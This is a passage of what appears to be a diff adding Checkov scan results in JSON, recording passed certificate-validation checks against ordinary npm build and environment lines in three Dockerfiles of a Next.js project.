16, + "ENV NEXT_PUBLIC_API_URL=$NEXT_PUBLIC_API_URL \\\n" + ], + [ + 17, + " NEXT_PUBLIC_MARKETPLACE_URL=$NEXT_PUBLIC_MARKETPLACE_URL \\\n" + ], + [ + 18, + " NEXT_PUBLIC_DASHBOARD_URL=$NEXT_PUBLIC_DASHBOARD_URL \\\n" + ], + [ + 19, + " NEXT_PUBLIC_ADMIN_URL=$NEXT_PUBLIC_ADMIN_URL\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 16, + 19 + ], + "resource": "/Dockerfile.production.ENV", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-git-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_14", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "ENV", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "ENV NODE_ENV=production\n", + "value": "NODE_ENV=production", + "__startline__": 28, + "__endline__": 28 + }, + "label_": "resource: ENV", + "id_": "ENV", + "source_": "Dockerfile", + "content": "ENV NODE_ENV=production\n", + "value": "NODE_ENV=production", + "__startline__": 28, + "__endline__": 28, + "resource_type": "ENV", + "hash": "5a6afcff0e4c111b04ace6d372feb2943096034796456739be650482e87f3e0e" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 29, + "ENV NODE_ENV=production\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 29, + 29 + ], + "resource": "/Dockerfile.production.ENV", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-git-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_14", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "1d5fb0a211498b8baf37e5744578ad03459da7798534298981f23fdefb7eb757" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.test.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-git-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_14", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 10, + "__endline__": 10 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 10, + "__endline__": 10, + "resource_type": "RUN", + "hash": "fb809e4860a3131df821aea9480445cc6e2f66dd52744dab5f3d2ef5b2848436" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 11, + "RUN npm install\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 11, + 11 + ], + "resource": "/Dockerfile.test.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-git-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_14", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "ENV", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "ENV NODE_ENV=test\n", + "value": "NODE_ENV=test", + "__startline__": 12, + "__endline__": 12 + }, + "label_": "resource: ENV", + "id_": "ENV", + "source_": "Dockerfile", + "content": "ENV NODE_ENV=test\n", + "value": "NODE_ENV=test", + "__startline__": 12, + "__endline__": 12, + "resource_type": "ENV", + "hash": "14d83a642c69d4cf67fcdbeb6dace7ba464024fdcad52f8129d63c78042457cb" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 13, + "ENV NODE_ENV=test\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 13, + 13 + ], + "resource": "/Dockerfile.test.ENV", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-git-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_14", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.dev", + "config_": { + "content": "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n", + "value": "npm install -g npm@10.5.0 --no-fund --no-audit", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n", + "value": "npm install -g npm@10.5.0 --no-fund --no-audit", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "435bba968d1d0b4c410ea33851637829a16b2ad878f0b9531a737c7a444f91b9" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.dev.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-git-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_14", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.dev", + "config_": { + "content": "RUN npm ci --no-fund --no-audit\n", + "value": "npm ci --no-fund --no-audit", + "__startline__": 10, + "__endline__": 10 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm ci --no-fund --no-audit\n", + "value": "npm ci --no-fund --no-audit", + "__startline__": 10, + "__endline__": 10, + "resource_type": "RUN", + "hash": "57abb1bbe03890ab19f47e5f96b9cbcee02aab65f6980d523df42faf41b709fa" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 11, + "RUN npm ci --no-fund --no-audit\n" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 11, + 11 + ], + "resource": "/Dockerfile.dev.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-git-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_6", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "dbd32b6bad6b728919787011f82d60c50d7b2d1c079f814de2b1640696c98816" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-node-tls-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_6", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 20, + "__endline__": 20 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 20, + "__endline__": 20, + "resource_type": "RUN", + "hash": "6979b14e6a853ac150ffef85c5e28fd49c956054ea2cb1d01440e13b17260c4a" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 21, + "RUN npm install\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 21, + 21 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-node-tls-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_6", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm run db:generate\n", + "value": "npm run db:generate", + "__startline__": 21, + "__endline__": 21 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm run db:generate\n", + "value": "npm run db:generate", + "__startline__": 21, + "__endline__": 21, + "resource_type": "RUN", + "hash": "c1f9cc0c42260bb0183d7e7b9ec2edab99837111ad42dbbdd7fad09ff3e37ab0" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 22, + "RUN npm run db:generate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 22, + 22 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-node-tls-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_6", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm run build\n", + "value": "npm run build", + "__startline__": 22, + "__endline__": 22 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm run build\n", + "value": "npm run build", + "__startline__": 22, + "__endline__": 22, + "resource_type": "RUN", + "hash": "1bf185fb6038f1b491f2a2686de4dd9869ccdd9c3e34d2772cf43bd368377aa6" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 23, + "RUN npm run build\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 23, + 23 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-node-tls-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_6", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 30, + "__endline__": 30 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 30, + "__endline__": 30, + "resource_type": "RUN", + "hash": "01c88e306f7db45ae7136e3bdb63c4b15978dd024f6ed18210961fc3db3df382" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 31, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 31, + 31 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-node-tls-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_6", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "ARG", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "ARG NEXT_PUBLIC_API_URL\n", + "value": "NEXT_PUBLIC_API_URL", + "__startline__": 11, + "__endline__": 11 + }, + "label_": "resource: ARG", + "id_": "ARG", + "source_": "Dockerfile", + "content": "ARG NEXT_PUBLIC_API_URL\n", + "value": "NEXT_PUBLIC_API_URL", + "__startline__": 11, + "__endline__": 11, + "resource_type": "ARG", + "hash": "fded00a21c81cd45d8985324636a2acafc73bef594a45811ca0d68265da3f9dc" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 12, + "ARG NEXT_PUBLIC_API_URL\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 12, + 12 + ], + "resource": "/Dockerfile.production.ARG", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-node-tls-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_6", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "ARG", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "ARG NEXT_PUBLIC_MARKETPLACE_URL\n", + "value": "NEXT_PUBLIC_MARKETPLACE_URL", + "__startline__": 12, + "__endline__": 12 + }, + "label_": "resource: ARG", + "id_": "ARG", + "source_": "Dockerfile", + "content": "ARG NEXT_PUBLIC_MARKETPLACE_URL\n", + "value": "NEXT_PUBLIC_MARKETPLACE_URL", + "__startline__": 12, + "__endline__": 12, + "resource_type": "ARG", + "hash": "11d98758a432fc03021573afe4df769dc34ff0a4aec966f558b5e00c71c6cf3b" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 13, + "ARG NEXT_PUBLIC_MARKETPLACE_URL\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 13, + 13 + ], + "resource": "/Dockerfile.production.ARG", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-node-tls-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_6", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "ARG", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "ARG NEXT_PUBLIC_DASHBOARD_URL\n", + "value": "NEXT_PUBLIC_DASHBOARD_URL", + "__startline__": 13, + "__endline__": 13 + }, + "label_": "resource: ARG", + "id_": "ARG", + "source_": "Dockerfile", + "content": "ARG NEXT_PUBLIC_DASHBOARD_URL\n", + "value": "NEXT_PUBLIC_DASHBOARD_URL", + "__startline__": 13, + "__endline__": 13, + "resource_type": "ARG", + "hash": "4075db881e0d222faeb86e03db8a05d9a998deab344c05aee0e89d2426e01383" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 14, + "ARG NEXT_PUBLIC_DASHBOARD_URL\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 14, + 14 + ], + "resource": "/Dockerfile.production.ARG", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-node-tls-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_6", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "ARG", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "ARG NEXT_PUBLIC_ADMIN_URL\n", + "value": "NEXT_PUBLIC_ADMIN_URL", + "__startline__": 14, + "__endline__": 14 + }, + "label_": "resource: ARG", + "id_": "ARG", + "source_": "Dockerfile", + "content": "ARG NEXT_PUBLIC_ADMIN_URL\n", + "value": "NEXT_PUBLIC_ADMIN_URL", + "__startline__": 14, + "__endline__": 14, + "resource_type": "ARG", + "hash": "a4c9bf1c4e349946074fb4c606d0db63c06a809d125e58ddd09427e4d929fd6a" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 15, + "ARG NEXT_PUBLIC_ADMIN_URL\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 15, + 15 + ], + "resource": "/Dockerfile.production.ARG", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-node-tls-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_6", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "ENV", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "ENV NEXT_PUBLIC_API_URL=$NEXT_PUBLIC_API_URL \\\n NEXT_PUBLIC_MARKETPLACE_URL=$NEXT_PUBLIC_MARKETPLACE_URL \\\n NEXT_PUBLIC_DASHBOARD_URL=$NEXT_PUBLIC_DASHBOARD_URL \\\n NEXT_PUBLIC_ADMIN_URL=$NEXT_PUBLIC_ADMIN_URL\n", + "value": "NEXT_PUBLIC_API_URL=$NEXT_PUBLIC_API_URL NEXT_PUBLIC_MARKETPLACE_URL=$NEXT_PUBLIC_MARKETPLACE_URL NEXT_PUBLIC_DASHBOARD_URL=$NEXT_PUBLIC_DASHBOARD_URL NEXT_PUBLIC_ADMIN_URL=$NEXT_PUBLIC_ADMIN_URL", + "__startline__": 15, + "__endline__": 18 + }, + "label_": "resource: ENV", + "id_": "ENV", + "source_": "Dockerfile", + "content": "ENV NEXT_PUBLIC_API_URL=$NEXT_PUBLIC_API_URL \\\n NEXT_PUBLIC_MARKETPLACE_URL=$NEXT_PUBLIC_MARKETPLACE_URL \\\n NEXT_PUBLIC_DASHBOARD_URL=$NEXT_PUBLIC_DASHBOARD_URL \\\n NEXT_PUBLIC_ADMIN_URL=$NEXT_PUBLIC_ADMIN_URL\n", + "value": "NEXT_PUBLIC_API_URL=$NEXT_PUBLIC_API_URL NEXT_PUBLIC_MARKETPLACE_URL=$NEXT_PUBLIC_MARKETPLACE_URL NEXT_PUBLIC_DASHBOARD_URL=$NEXT_PUBLIC_DASHBOARD_URL NEXT_PUBLIC_ADMIN_URL=$NEXT_PUBLIC_ADMIN_URL", + "__startline__": 15, + "__endline__": 18, + "resource_type": "ENV", + "hash": "65abe3eb0aadfa3b1ed513b9e21f4f8c4524ec8c298e7123de46806870b90557" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 16, + "ENV NEXT_PUBLIC_API_URL=$NEXT_PUBLIC_API_URL \\\n" + ], + [ + 17, + " NEXT_PUBLIC_MARKETPLACE_URL=$NEXT_PUBLIC_MARKETPLACE_URL \\\n" + ], + [ + 18, + " NEXT_PUBLIC_DASHBOARD_URL=$NEXT_PUBLIC_DASHBOARD_URL \\\n" + ], + [ + 19, + " NEXT_PUBLIC_ADMIN_URL=$NEXT_PUBLIC_ADMIN_URL\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 16, + 19 + ], + "resource": "/Dockerfile.production.ENV", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-node-tls-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_6", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "ENV", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "ENV NODE_ENV=production\n", + "value": "NODE_ENV=production", + "__startline__": 28, + "__endline__": 28 + }, + "label_": "resource: ENV", + "id_": "ENV", + "source_": "Dockerfile", + "content": "ENV NODE_ENV=production\n", + "value": "NODE_ENV=production", + "__startline__": 28, + "__endline__": 28, + "resource_type": "ENV", + "hash": "5a6afcff0e4c111b04ace6d372feb2943096034796456739be650482e87f3e0e" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 29, + "ENV NODE_ENV=production\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 29, + 29 + ], + "resource": "/Dockerfile.production.ENV", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": 